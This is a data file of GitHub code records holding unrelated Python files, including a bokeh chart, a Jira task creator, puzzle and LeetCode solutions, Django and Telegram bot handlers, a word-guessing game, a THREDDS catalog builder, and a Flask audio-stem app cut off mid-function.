\"method\":oMethod,\n \"activity\":fuGetName(a).replace(\"{\",\"(\").replace(\"}\",\")\").replace(\"|\",\", \"), # replace {} from simapro activities to prevent errors\n \"contribution\": np.sign(a[\"global impact\"]) * abs(a[\"global impact\"] / ldContributions[0][\"global impact\"])\n } for a in direct_contributions]\n\n ldMethodActContrib += ld\n\n # make dataframe from list of dict\n dfContributions = pd.DataFrame(ldMethodActContrib)\n dfContributions = dfContributions.groupby(['method', 'activity']).sum().reset_index()\n\n # remove entries smaller than cutoff\n dfContributions = dfContributions[dfContributions[\"contribution\"].abs() >= fCutOff*abs(dfContributions[\"contribution\"].max())]\n\n # pivot, replace 0 with nan\n dfPivoted = dfContributions.pivot(index=\"method\", columns=\"activity\", values=\"contribution\")\n dfPivoted.fillna(0, inplace=True)\n\n # creating necessary dicts and lists for bokeh plot\n data_pos = {c : dfPivoted[c].values * (dfPivoted[c].values > 0) for c in dfPivoted.columns}\n data_neg = {c : dfPivoted[c].values * (dfPivoted[c].values < 0) for c in dfPivoted.columns}\n methods = dfContributions[\"method\"].unique()\n activities = dfPivoted.columns\n colors = [c for a, c in zip(activities, itertools.cycle(palette))]\n data_neg[\"methods\"] = data_pos[\"methods\"] = methods\n source1 = bokeh.models.ColumnDataSource(data=data_pos)\n source2 = bokeh.models.ColumnDataSource(data=data_neg)\n TOOLTIPS = [\n (\"method\", \"@methods\"),\n (\"activity\", \"$name\"),\n (\"contribution\", \"@$name\")\n ]\n\n # plot contributions per category\n f = bokeh.plotting.figure(x_axis_label=\"indicator\", y_axis_label='contribution to impact [-]',\n plot_width=width, plot_height=height*3, tooltips = TOOLTIPS,\n x_range=bokeh.models.FactorRange(*methods))\n p1 = f.vbar_stack(activities, x=\"methods\", width=0.5, alpha=0.6, fill_color=colors, line_color=\"white\", source=source1)\n f.vbar_stack(activities, x=\"methods\", width=0.5, alpha=0.6, fill_color=colors, line_color=\"white\", source=source2)\n\n # x label rotation\n f.xaxis.major_label_orientation = np.pi / 2\n\n # build legend\n if bLegend:\n legend = bokeh.models.Legend(items=[(l,[p]) for l,p in zip(activities,p1)], location=\"center\")\n f.add_layout(legend, 'above')\n\n # font sizes\n font_size = \"15pt\"\n f.xaxis.axis_label_text_font_size = \\\n f.yaxis.axis_label_text_font_size = \\\n f.xaxis.major_label_text_font_size = \\\n f.yaxis.major_label_text_font_size = \\\n f.legend.label_text_font_size = font_size\n\n # add tool for strict y-axis zoom\n f.add_tools(bokeh.models.WheelZoomTool(dimensions=\"height\"))\n\n # show the results\n bokeh.io.output_notebook()\n bokeh.io.show(f)\n\n pass\n","repo_name":"BenPortner/indirect_land_use_change_PV_corn","sub_path":"helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38509437922","text":"import csv\nfrom jira import client\nimport logging\n\n\nLG = logging.getLogger(__name__)\n\nTASK_TEMPLATE = \"\"\"h2. Requirements\n\nA description of the requirements for this item: This could include all or any of:\n* use cases\n* functional requirements\n* non-functional requirements\n* describe missing tests\n\nh2. Completion Criteria\n\nThis should list, preferably in bullet form, all of the criteria for completion of this task. Once these items have been met, the task is complete.\n\"\"\"\n\n\nclass ReleaseIssues:\n \"\"\"Reads issues from CSV\"\"\"\n\n def __init__(self, input_file):\n self._current = 0\n self._header = None\n self._tasks = None\n with open(input_file, 'rb') as csvfile:\n test_reader = csv.reader(csvfile)\n for row in test_reader:\n if self._header is None:\n self._header = [x.lower() for x in row]\n self._tasks = []\n continue\n\n record = dict(zip(self._header, row))\n self._tasks.append(record)\n\n @property\n def tasks(self):\n return self._tasks\n\n\n\n\ndef run(parsed_args):\n \"\"\"Execute release task creation\n\n parsed_args: command line arguemnts\"\"\"\n\n assert parsed_args.server\n assert parsed_args.user\n assert parsed_args.password\n assert parsed_args.ticket_file\n assert parsed_args.epic\n\n jira = None\n if not parsed_args.dry_run:\n jira = client.JIRA(server=parsed_args.server,\n basic_auth=(parsed_args.user, parsed_args.password))\n\n r = ReleaseIssues(parsed_args.ticket_file)\n for t in r.tasks:\n try:\n description = TASK_TEMPLATE\n issue_dict = {\n 'project': t.get('project'),\n 'summary': t.get('summary'),\n 'description': description,\n 'issuetype': {'name': 'Task'},\n # 'fixVersion': t.get('fixVersion'),\n # 'priority': t.get('priority'),\n }\n LG.error(issue_dict)\n if jira is not None:\n new_issue = jira.create_issue(fields=issue_dict)\n jira.add_issues_to_epic(parsed_args.epic, [new_issue.key])\n print('%s,%s' % (new_issue.key, new_issue.summary))\n except Exception as e:\n print('Unable to add issue: %s' % e)\n print('Unable to issue: %s' % t)\n","repo_name":"delapsley/relman","sub_path":"relman/cmd/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32707350020","text":"#!/usr/bin/env python3\nimport copy\nimport functools\nimport json\nimport itertools\nimport utils\nimport math\nfrom dataclasses import dataclass\nfrom typing import Tuple, List\n\n\n@dataclass\nclass NodePointer:\n value: object\n index: int\n level: int\n _position: Tuple[List, int]\n\n @property\n def is_primitive(self):\n return type(self.value) == int\n\n @property\n def is_regular(self):\n return type(self.value) == list and all(type(v) == int for v in self.value)\n\n def replace(self, new_value):\n lst, idx = self._position\n lst[idx] = new_value\n\n\ndef pointers(value, level=0, counter=None):\n counter = counter or itertools.count()\n for i, elem in enumerate(value):\n yield NodePointer(elem, next(counter), level + 1, (value, i))\n if type(elem) != int:\n yield from pointers(elem, level + 1, counter)\n\n\ndef try_explode(value):\n left_ptr = None\n exploded_ptr = None\n right_ptr = None\n\n for ptr in pointers(value):\n if exploded_ptr is None:\n if ptr.is_primitive:\n left_ptr = ptr\n elif ptr.level == 4 and ptr.is_regular:\n exploded_ptr = ptr\n elif ptr.index > exploded_ptr.index + 2 and ptr.is_primitive:\n right_ptr = ptr\n break\n\n if exploded_ptr:\n a, b = exploded_ptr.value\n if left_ptr:\n left_ptr.replace(left_ptr.value + a)\n if right_ptr:\n right_ptr.replace(right_ptr.value + b)\n exploded_ptr.replace(0)\n return True\n return False\n\n\ndef try_split(value):\n for ptr in pointers(value):\n if ptr.is_primitive and ptr.value >= 10:\n value = ptr.value\n ptr.replace([int(math.floor(value / 2)), int(math.ceil(value / 2))])\n return True\n return False\n\n\ndef sf_reduce(value):\n while True:\n if try_explode(value):\n continue\n if try_split(value):\n continue\n return\n\n\ndef sf_add(a, b):\n result = [copy.deepcopy(a), copy.deepcopy(b)]\n sf_reduce(result)\n return result\n\n\ndef magnitude(elem):\n if type(elem) == int:\n return elem\n else:\n a, b = elem\n return 3 * magnitude(a) + 2 * magnitude(b)\n\n\ndef main():\n numbers = [json.loads(line.strip()) for line in utils.input()]\n result = functools.reduce(sf_add, numbers)\n print(result)\n print(magnitude(result))\n magnitudes = (magnitude(sf_add(a, b)) for a, b in itertools.permutations(numbers, 2))\n print(max(magnitudes))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"technocoreai/aoc2021","sub_path":"aoc18.py","file_name":"aoc18.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17942440186","text":"# с помощью данной функции, мы находим периметр всех имеющихся островов на карте.\n# сложность: O(m * n).\n\nclass Solution:\n def islandPerimeter(self, grid: List[List[int]]) -> int:\n\n # задаем переменную для результата\n perimeter = 0\n\n # создаем переменные для колонок и рядов\n height, weight = len(grid), len(grid[0])\n\n # циклами проходим по всем элементам на карте\n for row in range(height):\n for column in range(weight):\n\n # присваиваем каждому острову периметр 4\n if grid[row][column]:\n perimeter += 4\n\n # если над островом есть еще остров, то вычитаем 2\n if row and grid[row-1][column]:\n perimeter -= 2\n\n # если слева острова есть еще остров, то вычитаем 2\n if column and grid[row][column-1]:\n perimeter -= 2\n\n return perimeter\n","repo_name":"blinmakersha/HW_algorithm_1_semestr","sub_path":"HW_3/fifth_task.py","file_name":"fifth_task.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"28798301033","text":"from telegram import Update, ReplyKeyboardMarkup\nfrom telegram.ext import ContextTypes, CommandHandler, MessageHandler, filters, ConversationHandler\nimport word as w\nfrom home_markup import markup, goHome\n\n# /add 관련 state 설정\nSEARCH_ITEM, APPLY_ITEM = range(2)\n\nasync def add_command(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text(\"가격변동 알리미 🔔\\n검색어를 상세하게 입력해주세요 🔍\\n최대 15개의 상품이 조회됩니다.\")\n return SEARCH_ITEM\n\n\n# 아이템 검색\nasync def search_list(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text(\"상품을 검색중입니다. 잠시만 기다려주세요 🔍\")\n # 검색이 됐다고 가정을 하는 리스트\n data_list = [\n [\"등록완료\"],\n [\"아이패드 프로 12.9 5세대 M1^_^v_\"],\n [\"아이패드 프로 11인치 3세대 M1^_^v_\"],\n [\"아이패드 거치대^_^v_\"],\n [\"아이패드 미니 6세대 64Gb 와이파이^_^v_\"],\n [\"에러발생용 미니 6세대 64Gb 와이파이\"]\n ]\n reply_list = ReplyKeyboardMarkup(data_list, one_time_keyboard=False)\n await update.message.reply_text(\"알림 받기 원하는 상품을 클릭해주세요 🔔\\n여러개 선택이 가능하며, 모두 선택 후 완료 버튼을 눌러주세요 😊\", reply_markup=reply_list)\n return APPLY_ITEM\n\n\n# 아이템 등록\nasync def add_item(update: Update, context: ContextTypes.DEFAULT_TYPE):\n message = update.message.text\n\n if(w.PARSER in message):\n try:\n await update.message.reply_text(\"선택상품 등록 완료 :: {}\".format(message))\n except:\n await update.message.reply_text(\"등록중 오류가 발생했습니다 🚫\\n🔽 키보드 왼쪽 메뉴를 이용해주세요\", reply_markup=markup)\n return ConversationHandler.END\n else:\n await goHome(update=update)\n return ConversationHandler.END\n\n\nasync def done_add_item(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await goHome(update=update)\n return ConversationHandler.END\n\n\nasync def error_task(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await goHome(update=update)\n return ConversationHandler.END\n\n\n# 핸들러 설정\nconv_handler = ConversationHandler(\n entry_points=[CommandHandler(\"add\", add_command)],\n states={\n # 아이템 검색\n SEARCH_ITEM: [\n MessageHandler(filters.TEXT, search_list)\n ],\n # 아이템 등록\n APPLY_ITEM: [\n # 1. 등록완료\n MessageHandler(filters.Regex(\"^({})$\".format(w.ADD_DONE)), done_add_item ),\n # 2. 계속등록\n MessageHandler(filters.TEXT & ~(filters.COMMAND), add_item)\n ]\n },\n fallbacks=[MessageHandler(filters.TEXT, error_task)],\n )","repo_name":"flxh4894/python_study","sub_path":"handler/custom_add_handler.py","file_name":"custom_add_handler.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2796965640","text":"# Write a function named unique_common that accepts two lists both of which contain integers as parameters and returns a sorted list (ascending order) which contains unique common elements from both the lists. If there are no common elements between the two lists, then your function should return the keyword None\n#\n# For example, if two of the lists received by the function are:\n#\n# ([5, 6, -7, 8, 8, 9, 9, 10], [2, 4, 8, 8, 5, -7])\n#\n# You can see that elements 5, -7, and 8 are common in both the first list and the second list and that the element 8 occurs twice in both lists. Now you should return a sorted list (ascending order) of unique common elements like this:\n#\n# [-7, 5, 8]\n#\n# if the two lists received by the function are:\n#\n# ([5, 6, 7, 0], [3, 2, 3, 2])\n#\n# Since, there are no common elements between the two lists, your function should return the keyword\n#\n#None\n#\n# compara los elementos entre a y b\ndef unique_common(a, b):\n lista_extendida=[]\n for x in a:\n if x in b:\n lista_extendida.append(x)\n evalua_funcion_lista_depurada = funcion_lista_depurada(lista_extendida)\n if evalua_funcion_lista_depurada!=[]:\n return evalua_funcion_lista_depurada\n\n# Funcion recibe lista completa y elimina numeros repetidos\ndef funcion_lista_depurada(lista_extendida):\n lista_final = []\n for i in lista_extendida:\n if i not in lista_final:\n lista_final.append(i)\n lista_final.sort()\n registros = int(len(lista_final)) \n #return lista_final, registros\n return lista_final\n \n# OJO SOLO LA FUNCION!!!\n# Main Program #\na = [1,2,3,4,5,6,5,7,8,9,-1]\nb = [4,9,10,12,-1,5,13,1]\nevalua_unique_common = unique_common(a, b) \nprint(evalua_unique_common)\n","repo_name":"ivanromanv/manuales","sub_path":"Python/Edx_Course/Introduction to Programming Using Python/Excercises/W5_Midterm Exam_elementos_comunes_unicos.py","file_name":"W5_Midterm Exam_elementos_comunes_unicos.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"25855823010","text":"from django.http import JsonResponse\nimport json\n\n# 导入 city \nfrom common.models import Citylog\n\ndef dispatcher(request):\n # 将请求参数统一放入request 的 params 属性中,方便后续处理\n\n # GET请求 参数在url中,同过request 对象的 GET属性获取\n if request.method == 'GET':\n request.params = request.GET\n\n # POST/PUT/DELETE 请求 参数 从 request 对象的 body 属性中获取\n elif request.method in ['POST','PUT','DELETE']:\n # 根据接口,POST/PUT/DELETE 请求的消息体都是 json格式\n request.params = json.loads(request.body)\n\n\n # 根据不同的action分派给不同的函数进行处理\n action = request.params['action']\n if action == 'list_city':\n return listcities(request)\n elif action == 'add_city':\n return addcity(request)\n elif action == 'modify_city':\n return modifycity(request)\n elif action == 'del_city':\n return deletecity(request)\n\n else:\n return JsonResponse({'ret': 1, 'msg': '不支持该类型http请求'})\n\ndef listcities(request):\n # 返回一个 QuerySet 对象 ,包含所有的表记录\n qs = Citylog.objects.values()\n\n # 将 QuerySet 对象 转化为 list 类型\n # 否则不能 被 转化为 JSON 字符串\n retlist = list(qs)\n\n return JsonResponse({'ret': 0, 'retlist': retlist})\n\ndef addcity(request):\n\n info = request.params['data']\n\n # 从请求消息中 获取要添加客户的信息\n # 并且插入到数据库中\n # 返回值 就是对应插入记录的对象 \n record = Citylog.objects.create(key=info['key'] ,\n time=info['time'])\n\n return JsonResponse({'ret': 0, 'id':record.id})\n\n\ndef modifycity(request):\n\n # 从请求消息中 获取修改客户的信息\n # 找到该客户,并且进行修改操作\n \n cityid = request.params['id']\n newdata = request.params['newdata']\n\n try:\n # 根据 id 从数据库中找到相应的客户记录\n city = Citylog.objects.get(id=cityid)\n except Citylog.DoesNotExist:\n return {\n 'ret': 1,\n 'msg': f'id 为`{cityid}`的城市不存在'\n }\n\n\n if 'key' in newdata:\n city.key = newdata['key']\n if 'time' in newdata:\n city.time = newdata['time']\n\n # 注意,一定要执行save才能将修改信息保存到数据库\n city.save()\n\n return JsonResponse({'ret': 0})\n\ndef deletecity(request):\n\n cityname = request.params['key']\n\n try:\n # 根据 key 从数据库中找到相应的城市记录\n cityinfo = Citylog.objects.get(key=cityname)\n except Citylog.DoesNotExist:\n return {\n 'ret': 1,\n 'msg': f'key 为`{cityname}`的城市不存在'\n }\n\n # delete 方法就将该记录从数据库中删除了\n cityinfo.delete()\n\n return JsonResponse({'ret': 0})","repo_name":"sssjmmm/Microservice-Architecture","sub_path":"backend-projects/bysms/mgr/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17485594882","text":"\"\"\"KVRX URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n #Index\n url(r'^$', views.index, name=\"pages_index\"),\n #Hardcoded pages\n url(r'^base', views.base, name=\"pages_base\"), #REMOVE IN PRODUCTION\n url(r'^shows', views.shows, name=\"pages_shows_index\"),\n url(r'^login', views.login, name=\"pages_login\"),\n #Keyword pages\n url(r'^dj/(?P.+)/$', views.dj_detail, name=\"pages_dj_detail\"),\n url(r'^show/(?P.+)/$', views.show_detail, name=\"pages_show_detail\"),\n #User created pages (CMS)\n url(r'^(?P
.+)/$', views.custom_page, name=\"pages_custom_page\"),\n]\n\nadmin.site.site_header = 'KVRX Admin'\nadmin.site.site_title = 'KVRX Admin'","repo_name":"mattjegan/KVRX-Website","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"41133462986","text":"\r\n\r\n# Use a dictionary\r\n#\r\nimport random\r\n\r\npoints = 0\r\ntries = 0\r\n\r\nwords = {\r\n \"Love\" :[\"A word for affection.\", \"A feeling of compassion.\", \"A feeling of great interest in something.\", \"A romantic feeling.\"],\r\n \"Endgame\" :[\"The highest grossing movie of all time.\", \"The last movie of one the most watched movie series.\", \"Pepperony's last movie together.\", \"'If I tell you, it wont happen.'\"],\r\n \"Sia\" :[\"He/she is the inspiration of the movie 'Music'.\", \"He/She sang 'Move you body'.\", \"He/She sang 'Elastic heart'.\", \"In his or her song, 'I don't need money.'\"],\r\n \"Church\" :[\"The body of Christ.\", \"A gathering of people who come to worship God.\", \"A place of worship.\", \"The house of God.\"],\r\n \"Gay\" :[\"To be extremely happy.\", \"To be attracted to the same sex.\", \"To be in a romantic relationship with the same sex.\", \"It has the letter 'y'.\"],\r\n \"Game\" :[\"To be ready for something.\", \"To be prepared for something\", \"A state of readiness.\", \"To be prepared.\"],\r\n \"Queen\" :[\"The name of a former popular boy-band.\", \"The female head of a monarchy.\", \"Has double letter 'e'.\", \"The wife of a king.\"]\r\n}\r\n\r\nscores = {} \r\n\r\nkeys = []\r\nfor k in words.keys():\r\n keys.append(k)\r\n\r\nuser_valid_plays = []\r\n\r\nword = \"\"\r\nhint = \"\"\r\n\r\ndef set_word():\r\n global words, word, hint, keys, user_valid_plays\r\n word = random.choice(keys)\r\n hint = random.choice(words[word])\r\n user_valid_plays = []\r\n x = 0\r\n\r\ndef settings():\r\n global tries\r\n do = input(\"What level of this game do you wish to play:\\n 1. Easy Level\\n 2. Medium Level\\n 3. Hard Level\\n : \")\r\n if do == \"1\":\r\n tries = 5\r\n elif do == \"2\":\r\n tries = 3\r\n elif do == \"3\":\r\n tries = 1\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n settings()\r\n game()\r\n\r\ndef is_complete():\r\n global user_valid_plays, word\r\n for w in word:\r\n if w.lower() not in user_valid_plays:\r\n return False\r\n return True\r\n \r\ndef print_dashes():\r\n global word, user_valid_plays\r\n for i in word:\r\n if i.lower() in user_valid_plays:\r\n print(i,end=\" \")\r\n else:\r\n print(\"_\",end=\" \")\r\n print(\"\")\r\n\r\ndef game(): \r\n global x, points, tries\r\n name = input(\"Input your player name: \")\r\n try:\r\n scores[name]\r\n except:\r\n scores[name] = 0\r\n \r\n attempts = tries\r\n set_word()\r\n print_dashes()\r\n print(\"Hint:\",hint)\r\n while attempts > 0:\r\n if not is_complete():\r\n guess = input(\"Guess a letter in this word: \").strip().lower()\r\n if len(guess) > 1:\r\n attempts = attempts - 1\r\n print(\"Input one letter at a time... You have\",attempts,\"tries left\")\r\n elif guess in word.lower():\r\n user_valid_plays.append(guess)\r\n print(\"This letter is in the word\") \r\n else:\r\n attempts = attempts - 1\r\n print(\"The letter is not a in the word... You have\",attempts,\"tries left\")\r\n if attempts == 0:\r\n print(\"The word is:\",word)\r\n again()\r\n print_dashes()\r\n points = attempts\r\n else:\r\n print(\"CONGRATULATIONS!!!\")\r\n scores[name] += points\r\n again()\r\n \r\n\r\ndef leaderboard():\r\n global points, scores, name\r\n print(\">>>>>LEADERBOARD<<<<<\")\r\n print(\"PLAYER NAME\\t|\\tSCORE\")\r\n \r\n sx = list(scores.values())\r\n \r\n sy = []\r\n for s in sx:\r\n if s not in sy:\r\n sy.append(s)\r\n \r\n sy.sort(reverse=True)\r\n\r\n for y in sy:\r\n for s in scores.items():\r\n if s[1] == y:\r\n print(f\"{s[0]} \\t\\t | \\t {s[1]}\")\r\n #print(scores.items())\r\n \r\ndef again():\r\n global tries, x\r\n again = input(\"Do you wish to:\\n 1. Play again.\\n 2. Go to main menu.\\n 3. Quit\\n : \")\r\n if again == \"1\":\r\n game()\r\n elif again == \"2\":\r\n opt()\r\n elif again == \"3\":\r\n quit()\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n opt()\r\n\r\ndef addList():\r\n word = input(\"Input the word to be added: \")\r\n hint = input(\"Input the hint to be added: \")\r\n words.update({word: hint})\r\n input(\"Press Enter\")\r\n print(f\"Word: {word} \\t|\\t Hint: {hint}\\n\")\r\n opt()\r\n\r\ndef opt():\r\n global tries, x\r\n do = input(\"Do you wish to:\\n 1. Play a new game.\\n 2. Go to settings.\\n 3. Check leaderboard\\n 4. Add a word\\n : \")\r\n if do == \"1\":\r\n print(\"NOTE: This game will automaticlly start from the easy level.\\nHowever you can change this in settings.\")\r\n input(\"Press Enter\")\r\n tries = 5\r\n game()\r\n elif do == \"2\":\r\n settings()\r\n elif do == \"3\":\r\n leaderboard()\r\n elif do == \"4\":\r\n addList()\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n opt()\r\n \r\n#def name():\r\n #name = input(\"Input your player name: \")\r\n \r\ntry:\r\n print(\">>>>>Guess the Word<<<<<\")\r\n opt()\r\nexcept:\r\n print(\"Code Error... Restart this program\")\r\n input(\"Press Enter\")\r\n opt()\r\n \r\n","repo_name":"mistlebeehyper/Python-Codes","sub_path":"Game 2.py","file_name":"Game 2.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10681054272","text":"# encoding: utf-8\n\"\"\"\n\n\"\"\"\n__author__ = 'Richard Smith'\n__date__ = '25 Feb 2020'\n__copyright__ = 'Copyright 2018 United Kingdom Research and Innovation'\n__license__ = 'BSD - see LICENSE file in top-level package directory'\n__contact__ = 'richard.d.smith@stfc.ac.uk'\n\nfrom tds_utils.create_catalog import CatalogBuilder, AccessMethod, DatasetRoot, AvailableServices, Aggregation, get_catalog_name, CatalogRef\nfrom collections import namedtuple\nimport os\nfrom jinja2 import Environment, PackageLoader\n\n\n# Not used?\nProperty = namedtuple('Property', ('name', 'value'))\nVariable = namedtuple('Variable', ['name', 'vocabulary_name', 'units'])\n\n\nclass Dataset:\n \"\"\"\n Not used?\n \"\"\"\n\n def __init__(self, id, name=None, urlpath=None, properties=[], access_methods=[], size=None):\n self.name = name if name else id\n self.id = id\n self.urlpath = urlpath\n self.properties = properties\n self.access_methods = access_methods\n self.dataSize = size\n\n\nclass CCICatalogBuilder(CatalogBuilder):\n DS_ROOT = 'esg_esacci'\n\n def __init__(self):\n super().__init__()\n self.env = Environment(loader=PackageLoader(\"cci_publisher\", \"templates\"))\n self.env.trim_blocks = True\n self.env.lstrip_blocks = True\n\n def create_dataset(self, result, file_services):\n \"\"\"\n Not used?\n\n :param result:\n :param file_services:\n :return:\n \"\"\"\n this_id = result['name']\n\n # Going from [1:] to remove the first slash\n url_path = os.path.join(self.DS_ROOT, result['directory'][1:], this_id)\n a_meths = [AccessMethod(s, url_path, \"NetCDF-4\") for s in file_services]\n\n size = result['size']\n\n dataset = Dataset(id=this_id, access_methods=a_meths, size=size)\n\n return dataset\n\n def dataset_catalog(self, ds_id, opendap=False):\n \"\"\"\n Build a THREDDS catalog and return the XML as a string\n\n :param ds_id: DRS ID\n :type ds_id: str\n\n :param opendap: Whether or not the service is available via opendap\n :type opendap: bool\n\n :return: XML string\n :rtype: string\n \"\"\"\n # Work out which services are required\n file_services = {AvailableServices.HTTP.value}\n aggregation = None\n\n if opendap:\n file_services.add(AvailableServices.OPENDAP.value)\n\n all_services = file_services.copy()\n\n context = {\n \"services\": all_services,\n \"dataset_id\": ds_id,\n \"aggregation\": aggregation,\n }\n\n return self.render(\"dataset_catalog.xml\", **context)\n\n def root_catalog(self, cat_paths, root_dir, name=\"THREDDS catalog\"):\n \"\"\"\n Build a root-level catalog that links to other catalogs, and return the\n XML as a string\n\n :param cat_paths: paths to dataset xml records\n :type cat_paths: list\n\n :param root_dir: the location of the root catalog.xml\n :type root_dir: str\n\n :param name: name of root catalog\n :type name: str\n\n :return: XML String\n :rtype: str\n \"\"\"\n catalogs = []\n\n for path in cat_paths:\n cat_name = get_catalog_name(path)\n\n # href must be relative to the root catalog itself\n href = os.path.relpath(path, start=root_dir)\n catalogs.append(CatalogRef(name=cat_name, title=cat_name,\n href=href))\n\n return self.render(\"root_catalog.xml\", name=name, catalogs=catalogs)","repo_name":"cedadev/cci-publisher","sub_path":"cci_publisher/datasets/create_catalog.py","file_name":"create_catalog.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33364207586","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\n\nclass Solution:\n def __init__(self) :\n self.preorder_index = 0\n self.preorder = None\n\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n\n hashmap = {num : i for i, num in enumerate(inorder)}\n self.preorder = preorder\n\n def _buildTree(left, right) :\n if left > right :\n return\n\n rootval = self.preorder[self.preorder_index]\n root = TreeNode(rootval)\n\n self.preorder_index += 1 \n\n next_right = hashmap[rootval]\n root.left = _buildTree(left, next_right - 1)\n root.right = _buildTree(next_right + 1, right)\n\n return root\n \n return _buildTree(0, len(inorder) - 1)\n","repo_name":"watanka/leetcode","sub_path":"0105-construct-binary-tree-from-preorder-and-inorder-traversal/0105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_name":"0105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"23999047907","text":"from __future__ import unicode_literals\nfrom concurrent.futures import process\nfrom flask import Flask, jsonify, render_template, request,json,send_from_directory, flash, url_for, redirect, session,send_file,redirect\nfrom flask_wtf import FlaskForm\nfrom wtforms import SelectField,HiddenField,SubmitField,FieldList,FormField\nimport vamp\nimport librosa\nimport ffmpeg\nimport os\nimport pyin\nimport subprocess\nimport pretty_midi\nfrom madmom.features.downbeats import DBNDownBeatTrackingProcessor,RNNDownBeatProcessor\nimport pandas as pd\nfrom functools import wraps\nfrom wtforms import Form, BooleanField, TextField, PasswordField, validators,RadioField\nimport gc\nimport math\nimport requests\nimport sys,traceback\nfrom pathlib import Path\nimport pydub\nfrom pydub import AudioSegment\nfrom IPython.display import Audio\nimport numpy as np\nimport scipy as sp\nimport scipy.signal\nfrom scipy.io.wavfile import write\nimport os.path\nimport time\n\n\n# from spleeter.separator import Separator\n\n\napp = Flask(__name__)\napp.config['SESSION_TYPE'] = 'memcached'\napp.config['SECRET_KEY'] = 'pretty secret key'\nUPLOAD_FOLDER = './static/audio_uploads'\nSTEMS_FOLDER = './static/stems'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['STEMS_FOLDER'] = STEMS_FOLDER\n#dev_mode = 'TRUE'\n#print(\"fn \",Flask(__name__))\n\n\n# @app.route('/api//')\n# def api_get_filepath(filepath):\n# return json.jsonify({\n# 'filepath': filepath\n# })\n\ndef separate_stems(filePath,fileName):\n print(\"\\nseparating stems\")\n # sep = Separator('spleeter:2stems')\n print(\"separator ran\")\n # sep.separate_to_file(file_path,output_path,codec='mp3')\n print(\"we do be having issues if this doesnt show\")\n\n outputPath = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/\" + fileName.replace(\".wav\", \"\") + \"/bass.wav\"\n\n print(filePath)\n\n # WE USE SUBPROCESS NOW::\n\n demucsCommand = \"demucs -d cpu -n mdx_q \"\n\n subprocess.run(demucsCommand+filePath)\n\n return(outputPath)\n\n # return render_template('play_audio.html',filename=filePath)\n\n\n\n # subprocessCommand = \"spleeter separate -p spleeter:4stems -o output/ \"\n # print(filePath)\n # print(subprocessCommand+filePath)\n # subprocess.run(subprocessCommand+filePath)\n\n # if __name__ == \"__main__\": \n # separator = Separator('spleeter:2stems')\n # separator.separate_to_file(filePath, outputPath)\n # print('sep is running')\n\n # print('subprocess is done now')\n# @app.route(\"/change_audio\")\n# def change_audio(filePath, sample):\n# return filePath, sample\n\n\n#reading in stems from demucs separation\n\ndef bass_stem_definitions(path_to_bass,path_to_orig):\n [stem,sr1] = librosa.load(path_to_bass) #### path for bass stem\n [original,sr2] = librosa.load(path_to_orig) #### path for whole song\n\n #lowpass filter to remove extraneous signal noise\n lowpass = scipy.signal.butter(2, 5000, 'lowpass', fs=sr1, output='sos')\n filtered = 